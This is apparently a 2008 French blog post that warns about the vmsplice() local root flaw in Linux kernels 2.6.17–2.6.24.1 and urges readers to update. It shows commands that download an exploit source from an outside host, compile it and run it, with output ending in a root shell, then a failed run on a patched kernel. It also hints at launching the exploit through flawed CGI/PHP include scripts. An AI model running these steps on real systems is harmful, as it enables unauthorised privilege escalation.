Vmsplice root exploit

février 12th, 2008
|

Depuis peu, une faille a été découverte dans l’appel du système vmsplice(), les noyaux Linux 2.6.17 à 2.6.24.1 sont touchés. Elle est plutôt critique puisqu’un simple utilisateur peut devenir root en l’exploitant.

1
2
$ uname -smr
Linux 2.6.23.16.. i686

Voici un exemple d’utilisation :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ cd /tmp
$ wget http://www.crashdump.fr/~polux/rootexploit/rootexploit.c
$ gcc -o rootexploit rootexploit.c
$ ./rootexploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7dee000 .. 0xb7e20000
[+] root
Exploit gone!
# id -u
0


… voila qui est plutôt grave, mettez donc a jour vos kernel:

1
2
$ uname -smr
Linux 2.6.24.2.. i686
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ ./rootexploit
-----------------------------------
 Linux vmsplice Local Root Exploit
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7dfc000 .. 0xb7e2e000
[-] vmsplice: Bad address
$ id -u
1000

De plus, on pourrais imaginer une utilisation de cet exploit via des scripts cgi, php,.. Mal programmé – En exploitant une faille include – Et la je vous laisse imaginer le drame !

Un petit conseil donc: Mettez votre système à jour régulièrement !

Leave a comment: